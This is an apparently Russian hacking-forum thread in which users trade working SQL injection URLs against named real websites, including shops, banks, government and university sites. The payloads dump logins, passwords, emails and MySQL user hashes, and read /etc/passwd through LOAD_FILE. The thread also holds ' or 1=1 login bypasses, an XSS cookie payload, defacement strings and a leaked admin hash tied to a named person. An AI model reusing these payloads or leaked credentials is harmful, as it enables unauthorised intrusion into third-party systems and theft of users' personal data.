Связной.Ру
http://svyaznoy.ru/index.php5?action=DAInfo58&SvyaznoyInfo=-1%20union%20select%201,2,3,4,5,6,7,8,9/*


HpplaZa.ru
http://hpplaza.ru/catalog/details.asp?ware=1'

http://abris.info/price/mark1.asp?id=-1

_http://www.allimitepatagonia.com.ar/productos.php?id_nexo=-2+UNION+SELECT+convert(version()%20using%20latin1) ,2/*

Нам cfm не преграда :)
canpharm.com
https://www.canpharm.com/index.cfm/fuseaction/cart.add?cart_productsize_fk=1+or+1=(SELECT+TOP+10 +TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+T ABLE_NAME+NOT+IN+(Provincestate))--

Zloy.org
http://zloy.org/news_n93'4.html
Уже месяц не могу закрыть...

BlueShop.ru
http://blueshop.ru/details.php?product_id=-796+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0/*

forum.vbios.com
http://forum.vbios.com/addons/kit/serverinfo.php?id=-1%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,0,0,0/*

И моя Гордость :)

http://www.secureusmeds.com/prices~category~0+union+select+convert(%22null%22% 20using%20utf8),LOAD_FILE('C:/boot.ini')+from+users.asp

Инет Магаз
http://apeks-msk.ru/category.php?id=-1+union+select+1,user(),3,4,5,6,7,8/*

Еще

http://antinomical.com/article/index.php?id_page=1+union+select+1,char(72,97,99,1 07,101,100,32,98,121,32,91,32,99,97,115,104,32,93) ,3,4,5,6,7/*

http://abris.info/price/mark1.asp?id=-1
http://abris.info/price/mark1.asp?id=1 or 1=@@version--
http://abris.info/price/mark1.asp?id=1 or 1=(select db_name())--

табличка login там :)

']forum.vbios.com
ты уже 3 раз постиш это.


23.10.2006, 01:48
HiM@S-_']http://forum.vbios.com/addons/kit/serverinfo.php?id=1%20UNION%20SELECT%201,2,3,4,5,6 ,7,8,9,10,11,12,1320/*

_http://edu.ru/index.php?page_id=10&action=viewcat&cat=7' - далее жмем на любой форум и видим


query failed: insert into nuke_referer values (NULL, '_http://edu.ru/index.php?page_id=10&action=viewcat&cat=7''):You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''_http://edu.ru/index.php?page_id=10&action=viewcat&cat=7'')' at


_http://www.srochno.mk.ru/article.asp?id=8324'

Пройдемся по банкам %)

_http://www.rs.ru/ru/index.php?id70=320'

_http://www.nationalbank.kz/?uid=9E21A7F6-802C-E8FB-3A9822E750174087&docid=178'

_http://www.trust.ru/common/promo_redirect.php?cid='13&lid=1&v=0&ul=L3J1L2luZGl2aWR1YWwvc2F2aW5ncy8=

_http://www.nbt.tj/?c=44&id=4'4&a=263'

_http://www.russlavbank.com/content.phtml?prcenter.newsdetail.276'

_http://www.sdm-bank.ru/news/20044'

_http://www.mtbank.ru/index.php?action='

_http://www.roscredit.ru/main/newsroom/news/38'

_http://www.forexpf.ru/forum/ - уязвим ( 2.1.6 rst exploit )

_http://www.paritate.ru/othernews/610301600'

Ребят а есть ли смысл выкладывать тут иньекции без перебора полей... я есть ли выложить около тысячи.

Подставляя одинарную кавычку далеко не уйдешь имхо.

shop.liprom.ru
apace+win+mssql :) жесть...

http://shop.liprom.ru/index.php
post
login ' or 1=1--
pass ' or 1=1--

далле
http://shop.liprom.ru/index.php?page=partner&keyval=18381&namekey=17945'+or+1=@@version--

http://shop.liprom.ru/index.php?page=partner&keyval=18381&namekey=17945'+or+1=(select+system_user)--

http://shop.liprom.ru/index.php?page=partner&keyval=18381&namekey=17945'+or+1=(select%20db_name())--

Далее

http://shop.liprom.ru/test/
post
login ' or 1=1--
pass ' or 1=1--

Ну и инклуд думаю все заметят...

Еще 1 шоп...
http://megagym.ru/show_cat2.php?grid=999+union+select+concat(user(), char(58),database(),char(58),version())/*

nationalbank.kz под sa запущен :)
http://www.nationalbank.kz/?uid=9E21A7F6-802C-E8FB-3A9822E750174087&docid=178+or+1=(select+system_user)--

http://www.oneills.ie/shop/index.asp?catID=-999+union+select+null--

В Microsoft JET Database Engine чисто по техническим причинам нельзя выполнить иньекцию в запрос...

http://section3.net/moblog/big.php?img=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*&pg=1

http://www.hallmarkstudentministry.com/moblog/big.php?img=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*&pg=1

http://quiddich.voldemort.ru/forum.php?forum=16&sid=&skey=&topic=-599+union+select+1,2,user(),4,5,6,7,8,9/*

http://www.teplo-tech.ru/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*&open=1
http://www.belvar.com/new/ru/production.html?id=-1+union+select+user()/*
http://www.meteoprog.com.ua/table.php?cityid=-1+union+select+1+from+admin/*

http://www.raggame.ru/characters.asp?p_ind=27'

админов предупредил - не латают.

http://sax777.com/?act=-2%20union%20select%201,2,concat(version(),char(32) ,user(),char(32),database()),4,5,6,7,8/*
Нашел, когда увидел вот этот http://hacker.sax777.com/ "хацкерский" квест.

http://polar-bags.ru/view.php?catalog=1&mode=shop&id=999'+union+select+null/*

http://www.raggame.ru/characters.asp?p_ind=27'
странно, помню в начале лета находил вот это:
http://www.raggame.ru/news.asp?id=558&board=1'

о баги не сообщал, через неделю его уже небыло, щас снова появилась... мистика ? :)
притом, вообще на сайте небыло никаких ошибок, щас смотрю вообще ничего не фильтруется

http://www.raggame.ru/default.asp?p_ind=116'&cl_id=
http://www.raggame.ru/default.asp?p_ind=116&cl_id='

вот только как заюзать хз, там вместе с insert запрос идет

http://rinar.net/index.cgi?c=content&id=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(USER(), 0x71),0x71),4,5,6,7,8,9/*

http://nornat.net/index.cgi?c=content&id=-1+union+select+1,2,333333333,4,5,6,7,8,9/*

http://nornat.net/index.cgi?c=news&show=9999+union+select+1,2,3,4,5,6,7+from+admin/*

http://zemliachestvo.com/religion/look.php?razdel=-1+union+select+1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT(U SER(),0x71),0x71),7,8,9,10/*

http://studybank.info/viewdetails.php?id=-306%20union%20select%201,email,3,4,5,username,7,8, 9 ,10,11,12,13,14%20from%20user/* здесь в таблице будет написан логин и пароль, а вот на фтп с этим не попадешь!

http://www.olprint.ru/catalog.php?id=363'

http://www.lasoon.com.ua/rus/news_big.php?id=-363%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20/*

http://www.travelonline.ru/act.php?pg=shop_razdel&cat2=-310&id=363'%20union%20select%201,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17/*
dalbwe He cmor

http://www.stena.ru/portfolio-det.php?page=15&id=21'

http://privet.zp.ua/place.php3?id=21'%20union%20select%201,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17/*

http://www.eatoutnewyork.com/orgs/show.php?ID=21'

http://www.chayclub.ru/index.php?page=63&id=21'

http://www.spektr-21.ru/read.phtm?id=21%20adnd%201=2

Мобильные порталы.
http://www.riot.ru/index.php?read&id=-1+union+select+user(),database()/*
http://myppc.ru/2006/10/26/-1'+union+select+1/*.html

Новостной портал.
http://media.molgvard.ru/index.php?action=showpic&cat=110&pic=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19/*

Уязвимость найденна не мной.
+toxa+


http://www.president.gov.mk/admin/
http://www.president.gov.mk/info.asp?SectionID=11&InfoID=1+or+1=(SELECT+TOP+1+cast(UserID+as+nvarcha r)%2B%27%3A%27%2Bcast(Username+as+nvarchar)%2B%27% 3A%27%2Bcast(Password+as+nvarchar)+FROM+Users+wher e+UserID=1)--#top

http://www.comdig.org/topic.php?id_forum=-11+UNION+SELECT+1,2,3,4,5,6,database(),8,9,0,1,2,3 ,4/*

+xss

http://www.comdig.org/index.php?id_issue=2006.21%3Cscript%3Ealert(docume nt.cookie)%3C/script%3E

Еще 1 шоп.
_http://www.edgeshop.ru/edge2.php?Id=326+union+select+concat(database(),ch ar(58),char(60,104,49,62,72,97,99,107,99,101,100,3 2,98,121,32,99,97,115,104,60,47,104,49,62))/*

MosTrud - Московская биржа трудa
http://www.mostrud.ru/partn.php?pid=120%20union%20select%20USER(),VERSIO N(),3,4,5/*

и etc/passwd/ ...

http://www.mostrud.ru/partn.php?pid=120%20union%20select%20USER(),VERSIO N(),3,4,LOAD_FILE('/etc/passwd')/*

http://www.stumptuous.com/cms/displaysection.php?sid=-1+union+select+1,2/*

OnContent (CMS)

http://www.pslawnet.org/cms/index.php?pid=50'

International Computer Music Conferenc :)
_http://www.icmc2005.org/index.php?selectedPage=-76+UNION+SELECT+1,2,3,4,convert(user()%20using%20l atin1),6,7,8/*

http://www.law.pitt.edu
http://www.law.pitt.edu/feed/rss2.php?blog=research&catid=34+union+select+null,password,null,null,null ,null,null,null,null,null,null,null,null,null,null +from%20mysql.user/*
http://career.coe.missouri.edu/
http://career.coe.missouri.edu/index.php?page=17+union+select+1,2,3,AES_DECRYPT(A ES_ENCRYPT(user(),0x71),0x71),5,6,7,8,9,0,1+/*

http://partner.km.ru/news_js.asp?DateTime=&ispicture=on&annot=on&targetWin=_top&Quantity=1&Encoding=Windows-1251&ShowWeather=&ChooseKanal=&OnlyTitle=&font=10000%20UNION%20SELECT%20TABLE_NAME%20FROM%20 INFORMATION_SCHEMA.TABLES&titletext=12&inftitle=12&inftext=12&theme=&color=fff8e7333333ffffff000000c0113bcacaca0000ff&whatShow=pict&vid=interview&width=300&idb=%7B46A58BDE-B173-4B77-9731-9026330FB003%7D&ids=%7B6C9EFA96-8323-4006-9F02-0E78AFBA60B0%7D

Журнал "Рынок ценных бумаг"
http://www.rcb.ru/archive/articlesrcb.asp?aid=7275+and(1=1)--

http://www.handspc.ru/soft/?type=99999999+union+select+newsid,2,3,4+from+news/*

Телекомпания "Метео ТВ" представляет: пароли юзеров из своей бд

http://www.meteo-tv.ru/news/item.php?newsID=-1391+UNION+SELECT+1,2,password,login,5,6,7+from+us ers/*

http://www.emotive.ru/shop/index.php?CID=9999999999+union+select+2,user()/*
http://anelik.diaspora.ru/forum.php?action=read&mid=-29+union+select+1,2,3,4,5,6,email,8,9+from+forum/*

http://saun.ru/sauna/?sauna=-1+union+select+1,2,3,4,5,6,7,8/*

cash писал
forum.vbios.com

http://forum.vbios.com/addons/kit/serverinfo.php?id=-1%20union%20select%20S_on,S_of,S_as,S_name,S_map,S _t,S_country,S_region,S_prior,S_id,S_adr,S_rating, S_players%20FROM%20kit_servers/*
ошибка при http://forum.vbios.com/addons/kit/serverinfo.php?id=-1%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,0,0,0,0/*
там берем поля

cash

http://www.emotive.ru/shop/index.php?CID=9999999999+union+select+2,3%20from%2 0koncert/*

_http://www.abcinformation.org/news_display.php?news_id=82+union+select+1,2,3,4,5 ,6,7,8,9,10/*
_http://www.impactsoft.ru/news_podr.php?news_id=91+union+select+1,2,3,4,5/*
_http://www.ratman.tv/news_estesa.php?news_ID=27+union+select+1,2,3,4/*
_http://www.pariteia.org/news_details.php?news_id=46+union+select+1,2,3,4,5 ,6,7,8,9/*
буду благодарен если кто нить в личку напишет вариант развития на одном из примеров, самому пока не удалось.

_http://www.abcinformation.org/news_display.php?news_id=82+union+select+1,2,3,4,5 ,6,7,8,9,10/*
http://abcinformation.org/news_display.php?news_id=82+union+select+1,2,conca t(id,char(59),answer,char(59),question),4,5,6,7,8, 9,10+from+faq/*

http://abcinformation.org/news_display.php?news_id=82+union+select+1,2,conca t(id,char(59),name,char(59),date),4,5,6,7,8,9,10+f rom+news/*


http://www.ratman.tv/news_estesa.php?news_ID=27+union+select+1,2,3,4/*

http://ratman.tv/news_estesa.php?news_ID=27+union+select+1,2,concat (admin_id,char(59),admin_user,char(59),admin_email ),4+from+admin/*



http://www.pariteia.org/news_details.php?news_id=46+union+select+1,2,3,4,5 ,6,7,8,9/*

нашол такие имена таблиц:
users
group
partners
news
e-mail
key
option
table
faq

Это за SQL Инъекции сойдёт? http://www.amper-com.ru/index.php?action=GlobalSearch&submit=wgsform&news=on&products=on&articles=on&words='

Редкость на aspx :)

http://barijessence.com/?Page=ModelShow&ProductID=1+or+1=(select+top+1+UserLoginName%2B':' %2BUserPassword+from+tblUsers+where+id=3)--

ФК Химки

_http://www.fckhimki.ru/modules/news/index.php?current_id=1&news_id=514+union+select+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14/*

http://www.hyipranks.com/?a=details&lid=2575+ORDER+BY+3/*

http://calipsogold.com/index.php?page='

http://ru-hosting.ru/article.php/?sid=999+union+select+null,null,null,null,null,uid +from+users+where+uid=2/*

http://www.bis-broker.com/sell/offer/?id=-3382%20union%20select%201,2,3,4,5,6,7,8,9,char(106 ),11,22,33,44,55,66,77,88,99,char(107),111,222,333 ,444,555,666,777,888,999,char(108),1111,2222,3333, 4444,5555,6666--
Таблица users с полями id, pass, name, email
Но почему-то если сделать from users, то пропадают результаты. Кто сможет что-то сделать новое, отпишите сюда или в ПМ.
Спасибо.

Нашел такую уязвимость SQL:
http://www.rusfond.ru/thank.html?user_id=hi'1=1--

http://www.eko.net.ua/index.php?page=docs&id=-26+UNION+SELECT+1,2,3,4,5,6,7,8

Version: 4.0.21-standard
Database: eko
User: eko@localhost
OS: Unix
/www/host/eko/htdocs/

http://www.smotri.te.ua/index.php?inc=catalog&under=-6125+union+select+1,2,3,4/*

Version: 4.0.21-standard
Database: smotri
User: smotri@localhost
OS: Unix
/www/host/smotri/htdocs/

http://www.crimeahouse.ru/index.php?pageId=24&id='2751
http://www.scoe.org/content.php?PageId=-1+union+select+1/*
http://www.slc.edu/index.php?pageID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

http://www.vanta.ru/script/catalog.php?cat=99999%20UNION%20SELECT%201,CHAR(60 ,104,49,32,115,116,121,108,101,61,34,99,111,108,11 1,114,61,114,101,100,59,34,62,88,84,111,111,108,12 2,46,82,117,32,32,45,32,240,243,235,232,242,32,225 ,229,241,239,229,231,228,251,41,41,60,47,104,49,62 ),3,CHAR(108,64,109,64,114,69,122),5,6,7,CHAR(244, 243,244,32,235,254,225,232,242,32,227,229,236,243, 46,46,46,32,242,238,235,252,234,238,32,242,232,245 ,238,44,32,237,232,241,235,238,226,224,32,227,229, 236,229,46,46,46,41,41,41),CHAR(228,238,245,243,25 5),10/*&clas=0

http://www.mka.ru/?p=44035'

_http://altholding.ru/database1.html?firm=-1+union+select+1,convert(user+using+cp1251),conver t(version()+using+cp1251),convert(user()+using+cp1 251),convert(password+using+cp1251)+from+mysql.use r/*&type=2

MTV
http://www.mtvasia.com/ubbthreads2/search.php?Cat=1)+union+select+1/*

_http://www.kkzmir.ru/gal.php?id=3+union+select+1,USER(),3,4/*

_http://shop.paintball.ru/index.php?act=ob&id=3+union+select+1,2,3/*
_http://www.paintball.ru/next.php?id=9+union+select+null,null,null/*
во всех формах поиска xss

_http://qwerty.ru/qwerty/antivirus+union+select+1/*

www.loveradio.ru

http://www.loveradio.ru:80/ru/main/homepage/login.php
POST login=' union+select+1,2/*&passw=123

_http://www.aura.vinnica.ua/ishtar/work.php?kat=2'
_http://automoto.com.ua/result-auto.php?id=2468'
_http://www.inna.com.ua/ru/comments/596'/
_http://www.icps.kiev.ua/about/experts/detailed.html?exp='
_http://www.versii.com.ua/section.php?sec=6'
_http://www.menr.gov.ua/
index.php?mode=indexpage&entity_id=12&id_det=143&index_page_id=5'
_http://telemir.com.ua/publication/show.html?idp=576'&r=220251'
_http://gostudy.com.ua/news.phtml?id=40'
_http://www.proformula.ua/gallery.phtml?id='
_http://sl.kiev.ua/mod.php?mod=userpage&page_id=72'
_http://www.autobiznet.com.ua/directory/firm.php?id_firm='

MAIL.RU

_http://sysadmin.mail.ru/rekords_detail.php?id=5555'


_http://soft.mail.ru/offer_for_users.php?id=99999'

:)

http://686.com/us/event_details.php?id=163'

hxxp://soft.mail.ru/offer_for_users.php?id=99999+union+select+1,2,3,4, 5,user(),system_user(),8,9,1,2,3,4,5+from+softmail _soft_free/*

_http://www.job4u.com.ua/cvInfo.php?id='
_http://www.goverla-tour.com.ua/country.php?countr_id='
_http://lecos.com.ua/new/mod.php?mod=userpage&menu=801&page_id=5'
_http://www.bis-el.kiev.ua/start.php?parent_id=0&part_id=1&article_id=230'
_http://www.karavan-megastore.com.ua/?view=read&n_id='

http://www.saranagati.net/shop/index.php?p=list&cid=9999999999+union+select+2,user()/*
http://www.sabasin.com/sabasin/shop/index.php?act=dca&mid=3008&cid=9999999999+union+select+2,user()/*

http://www.cycling.from.kz/theme.php?section=history&full=-2+union+select+1,2,333,4,5,6/*

http://www.edu.ru/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=99+order+by+4--

http://www.s-hotel.ru/index.php?module=subjects&func=listpages&subid=2'+union+select+null+/*

http://www.market.kz/tour/index.php?category=-14+union+select+1,2,3,4,5/*

http://www.market.kz/tour/index.php?cat=14&subcat=147+union+select+1,2,3,4,5/*

http://www.toscanaeuropa.it/approfondimenti/svilupposost/attivita/dettaglio.asp?id_doc='
http://www.delegazionepse.it/canali/cooperazione_sviluppo/documenti/dettaglio.asp?id_doc='
http://www.dsonline.it/magazine/documenti/dettaglio.asp?id_doc='

http://www.president.mn/show_module.php?index=dayinfo&dayinfoid=461+union+select+1,1,1,1,1,1,1,1,1,1,1,1 ,1,1/*

http://www.president.bg/en/news.php?id=69&st=-1

http://sex.dp.ua/topic.php?categor=9999999+UNION+SELECT+1,concat(lo gin,char(58),password,char(58),mail),0,4,5,6,7,8+F ROM+users/*

http://notebooks.neoshop.ru/show_notebooks.html?notebook_id=606/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13/*
http://www.neoshop.ru/main/order_now.html?what=order_comp&comp_id=99999999%27/**/union/**/select/**/1,1,3,1/*

ндя...

http://www.vzmakh.ru/b_sh/fotki1.php?novost=999'
вот вроде нашёл, сайт какой-то школы, тока у меня особо ничего не получилосс - хотел вытянуть пароль root от базы-ни хрена, может у кого выйдет?

Ыы
http://mobile.ru/news.php?news_id=-1+union+select+1,USER(),1,VERSION(),1,1,1,1+/*

_http://www.vzmakh.ru/b_sh/fotki1.php?novost=-1+UNION+SELECT+1,concat(user(),char(32,32),0x68616 36b206279205b2063617368205d)/*

http://www.realhit.ru/?page=news&id=-1+union+select+VERSION(),USER(),null/*

Ничё более не нарыл!

тут кто-то ссылку дал, я не могу подобрать нужные столбцы, таблтцу подобрал и логин вроде тоже, только осталось столбец с паролями взгляните?
_http://www.bis-el.kiev.ua/start.php?parent_id=0&part_id=1&article_id=230+union+select+2,2,3,4,login,6,7,8,9, 10,11+from+users/*
P, S. Кстати вот ещё вроде какая-то фишка
_http://www.bis-el.kiev.ua/start.php?part_id=2&basketshow=1

_http://www.bis-el.kiev.ua/start.php?parent_id=0&part_id=1&article_id=230+union+select+2,2,3,4,concat(login,c har(58),passwd,char(58),email),6,0x46726f6d205b206 3617368205d2077697468206c6f7665,8,9,10,11+from+use rs/*
логин:пасс:маил

Блин тупой пост, сори

Чайку? Ссылка уже была, просто немного её откорректировал))
_http://www.chayclub.ru/index.php?page=63&id=21+union+select+1,2,3,4,5,6,concat(login,char(5 8),password,char(58),email),8+from+users/*

------------------------------------------------------------------------
Продолжая перерабатывать ссылки данные здесь:
Вот вам продукт беспечности онлайн магазина, все пароли без хеша, всё открыто)))
http://www.esparto.co.uk/product.php?id=-454+UNION+SELECT+1,2,3,4,concat(email,char(58),pas sword),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31+from+account+limit+ 2,3/*

http://www.owebmoney.ru/oborona/forum_view.php?sub_id= -1+union+select+concat(email,char(58)),1+from+email s/*

http://www.ehouseholding.ru/?part=4&clause=-1+union+select+1,VERSION(),DATABASE(),4,5,6,USER()/*

http://www.filmplus.ru/?act=full%20story&movie%20id=34'

Разберем сайт www.megagym.ru
Для начала находим mysql хэш пароля админа

вот он: 0b1c68e72a1fc2c7
Далее вводим вот такой запрос

и получаем:
Разинков Александр:arazinkov@rambler.ru:3ead10984f 89f310
Вот тут админка::)
http://megagym.ru/admin/


Только один нюанс таблица name - имя человека, а не логин.
Сам логин вроде хранится в столбце username.

http://lenta.auctyon.ru/photo/view.php?id=64')+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,12,14,15,16,17,18/*
отсюда можно что-нибудь путное вытащить?

Вот ещё пароли от форума и т.д.
http://www.spbclub.ru/forum2/index.php?topic_id=-1+union+select+concat(login,char(58),password,char (32,32,32,32,72,105,32,102,114,111,109,32,84,101,1 14,109,105,110,64,76)),2+from+users+limit+1,2/*
Помогите подобрать столбцы я блин до 60 набрал, ни фига
http://www.tour-info.ru/news/jvs_news.html?num=-1

http://dist.1c.ru/page.jsp?t=1&Attr=4&Year=2004'+union+SELECT+1,TABLE_NAME,1+FROM+INFORM %20ATION_SCHEMA.TABLES--

http://www.scangirls.net/foto_pr.php?id=-251%20union%20select%201,2,3,4,5,6,7,8/*--
таблицу подобрать не смог

точно такойже сайт
http://www.eyla.net/foto_pr.php?id=-251%20union%20select%201,2,3,4,5,6,7,8/*--
видимо таблицы там одинаковые

Я не врубился, почему, когда я пытаюсь набрать Database(),http://www.scangirls.net/foto_pr.php?id=-251%20union%20select%201,2,3,4,5,6,7,8/*
меня обламывает и не показывает? Фильтрация?

http://www.scangirls.net/foto_pr.php?id=-251%20union%20select%201,2,3,4,AES_DECRYPT(AES_ENC RYPT(DATABASE(),0x71),0x71),6,7,8/*

http://www.auzr.kz/index.php?n=76-1
http://www.mit.kz/index.php?p=rofl&id_mm=3&act=2-1
http://www.sana.gov.kz/showarticle.php?lang=rus&id=-2 UNION SELECT 1,2,3,4,5,6,7,8/*
http://www.minagri.kz/news.jsp?param=rus&type=notices&noticeId=2725-1
http://www.zhambyl.kz/main.php?action=news&full=2&lan=eng&text_type=-1%20UNION%20SELECT%201,2,3,ascii(substring(passwor d,1,1)),5,6,7,8,9+from+mysql.user/*

:p

http://www.politeh.info/polls.php?id=7'+union+select+*+from+users/*

2 blaga :)

Вот от меня пару поздравлений в виде скулей

http://www.pharm-system.com/index.phtml?page=news&id=-1+union+select+null,char(60,104,49,62,71,111,117,1 00,105,110,105,32,239,238,231,228,240,224,226,235, 255,229,242,32,226,241,229,245,32,224,247,224,242, 238,226,246,229,226,32,241,32,205,195,60,47,104,49 ,62),null,null,null,null,null,null+from+users/*
[screen] (http://gaga.phpnet.us/files/screen1.gif)
http://www.khabibullin.kiev.ua/pabl_article_ua.php?page=1&id=-1+union+select+char(60,104,49,62,200,32,242,229,22 5,255,32,247,243,226,224,234,32,241,32,205,238,226 ,251,236,32,195,238,228,238,236,32,41,41,60,47,104 ,49,62),char(60,104,49,62,71,111,117,100,105,110,1 05,60,47,104,49,62)/*
[screen] (http://gaga.phpnet.us/files/screen2.gif)

_http://gaga.phpnet.us/toolz/chr.php
P.S. форум вставляет пробелы

Спасибо, тебя тожеhttp://www.pharm-system.com/index.phtml?page=news&id=-1+union+select+null,concat(nickname,char(58),passw ord,char(32,32,32,32,209,239,224,241,232,225,238,3 3,32,32,71,111,117,100,105,110,105)),null,null,nul l,null,null,null+from+users+limit+1,2/*

вот вам нипохек на сек.ру... оракл =\
http://catalog.sec.ru/catalogmgr.cfm?rub=99999'
кто хек раздолбит, пусть отчет кинет в 108117...

Blink: http://www.usfk.mil/USFK/contents/viewNews.asp?id=418'

http://top.ucoz.info/ucozCounter.php5?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1234 56,15,16,17,18/*
ucoz ;)

http://www.freetime.com.ua/1891/?raz=-99+union+select+1,2,concat(username,':',user_passw ord),4,5+from+forum.phpbb_users+where+user_icq%3E1 1111%20and%20user_icq%3C99999999/*

http://www.freetime.com.ua/1891/?raz=-99+union+select+1,2,LOAD_FILE(0x2f6574632f70617373 7764),4,5/*

http://www.freetime.com.ua/1891/?raz=-99+union+select+1,2,concat(user,0x3a,password),4,5 +from+mysql.user/*

(mysql root прилагается)
Юзайте на здоровье ;)

Это список всех колонок базы данных с
_http://www.goverla-tour.com.ua, но я не могу найти там
данные о пользователях, регистрация на сайте есть точно, посмотрите кому не лень, а то я запарился...

_http://www.goverla-tour.com.ua/country.php?countr_id=14+UNION+SELECT+1,2,table_na me,4,5,6,7,8,9+from+information_schema.tables/*

P.S. Похоже автоизация не работает, но можетчего полезное можно вытащить?

:: CHARACTER_SET_NAME
:: DEFAULT_COLLATE_NAME
:: DESCRIPTION
:: MAXLEN
:: COLLATION_NAME
:: ID
:: IS_DEFAULT
:: IS_COMPILED
:: SORTLEN
:: TABLE_CATALOG
:: TABLE_SCHEMA
:: TABLE_NAME
:: COLUMN_NAME
:: ORDINAL_POSITION
:: COLUMN_DEFAULT
:: IS_NULLABLE
:: DATA_TYPE
:: CHARACTER_MAXIMUM_LENGTH
:: CHARACTER_OCTET_LENGTH
:: NUMERIC_PRECISION
:: NUMERIC_SCALE
:: COLUMN_TYPE
:: COLUMN_KEY
:: EXTRA
:: PRIVILEGES
:: COLUMN_COMMENT
:: GRANTEE
:: PRIVILEGE_TYPE
:: IS_GRANTABLE
:: CONSTRAINT_CATALOG
:: CONSTRAINT_SCHEMA
:: CONSTRAINT_NAME
:: POSITION_IN_UNIQUE_CONSTRAINT
:: REFERENCED_TABLE_SCHEMA
:: REFERENCED_TABLE_NAME
:: REFERENCED_COLUMN_NAME
:: SPECIFIC_NAME
:: ROUTINE_CATALOG
:: ROUTINE_SCHEMA
:: ROUTINE_NAME
:: ROUTINE_TYPE
:: DTD_IDENTIFIER
:: ROUTINE_BODY
:: ROUTINE_DEFINITION
:: EXTERNAL_NAME
:: EXTERNAL_LANGUAGE
:: PARAMETER_STYLE
:: IS_DETERMINISTIC
:: SQL_DATA_ACCESS
:: SQL_PATH
:: SECURITY_TYPE
:: CREATED
:: LAST_ALTERED
:: SQL_MODE
:: ROUTINE_COMMENT
:: DEFINER
:: CATALOG_NAME
:: SCHEMA_NAME
:: DEFAULT_CHARACTER_SET_NAME
:: DEFAULT_COLLATION_NAME
:: NON_UNIQUE
:: INDEX_SCHEMA
:: INDEX_NAME
:: SEQ_IN_INDEX
:: COLLATION
:: CARDINALITY
:: SUB_PART
:: PACKED
:: NULLABLE
:: INDEX_TYPE
:: COMMENT
:: TABLE_TYPE
:: ENGINE
:: VERSION
:: ROW_FORMAT
:: TABLE_ROWS
:: AVG_ROW_LENGTH
:: DATA_LENGTH
:: MAX_DATA_LENGTH
:: INDEX_LENGTH
:: DATA_FREE
:: AUTO_INCREMENT
:: CREATE_TIME
:: UPDATE_TIME
:: CHECK_TIME
:: TABLE_COLLATION
:: CHECKSUM
:: CREATE_OPTIONS
:: TABLE_COMMENT
:: CONSTRAINT_TYPE
:: TRIGGER_CATALOG
:: TRIGGER_SCHEMA
:: TRIGGER_NAME
:: EVENT_MANIPULATION
:: EVENT_OBJECT_CATALOG
:: EVENT_OBJECT_SCHEMA
:: EVENT_OBJECT_TABLE
:: ACTION_ORDER
:: ACTION_CONDITION
:: ACTION_STATEMENT
:: ACTION_ORIENTATION
:: ACTION_TIMING
:: ACTION_REFERENCE_OLD_TABLE
:: ACTION_REFERENCE_NEW_TABLE
:: ACTION_REFERENCE_OLD_ROW
:: ACTION_REFERENCE_NEW_ROW
:: VIEW_DEFINITION
:: CHECK_OPTION
:: IS_UPDATABLE
:: app_id
:: countr_id
:: curort_id
:: app_name
:: app_plase
:: app_in
:: app_beach
:: app_razvl
:: app_teritory
:: app_img_num
:: app_img_ot
:: app_img_beach
:: tur_id
:: tur_name
:: tur_date
:: tur_path
:: tur_cntr_id
:: countr_name
:: full_name
:: naselen
:: area
:: klimat
:: religy
:: time
:: jazik
:: valuta
:: viza
:: customs
:: hotel
:: call_phone
:: auto
:: transport
:: medicin
:: osobennosti
:: big_img_file
:: click
:: curort_name
:: curort_txt
:: curort_txt1
:: curort_txt2
:: curort_img1
:: curort_img2
:: curort_img_3 _ о курорте
:: dict_id
:: substr
:: text
:: email_id
:: e_mail
:: date
:: eks_id
:: eks_name
:: eks_data
:: eks_path
:: eks_cntr_id
:: hot_id
:: hot_name
:: hot_date
:: hot_path
:: hot_cntr_id
:: id_img
:: path
:: flag
:: news_id
:: news_name
:: news_txt
:: news_img
:: file
:: file_name
:: part_id
:: part_name
:: part_patch
:: part_img
:: termin_id
:: term_name
:: term_opi

http://surnet.ru/show_txt.php?id=-99+union+select+1,2,3,4,5,6,char(60,115,99,114,105 ,112,116,62,97,108,101,114,116,40,39,112,114,101,1 18,101,100,39,41,60,47,115,99,114,105,112,116,62), 8/*

UTEL - Челябинск (Южно-Уральская сеть передачи данных)
На этом же сайте и статистика и т.д. ;)

http://www.expressglobal.ru/directions/china/tours/?id=-1+union+select+null/*
Вот одна, правда толку от неё...

http://pride.uoregon.edu/section.php?id=-1+union+select+1,2,3,4,5,6/*
одна :D была

Лень самому возиться с взломом... Сам нашел все...

http://hoster.od.ua/hosting/hosting_faq.php?news_id=1+union+select+1,user()/*
http://www.all4hosting.ru/index.asp?idSort=3&idPage=1+union+select+1,2,3--
http://www.ht-systems.ru/events/news.php?ID=4+union+select+1,2,3,4,LOAD_FILE('/etc/passwd'),6/*
http://aho.ru/hosting/tarifs.php?tgroup=2+union+select+1,2,3/*
http://uptime.ru/content.php?what=preleases&id=-1+union+select+1,login,password,4,5,6,7+from+users +limit+1,3/*
http://ivanhost.ru/?p=18&a=-3+union+select+USER(),DATABASE()/*
http://order.besthost.ru/order/index.php?hmid=-1+union+select+1,2,3,4,5,6,7,LOAD_FILE('/etc/passwd'),9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26/*

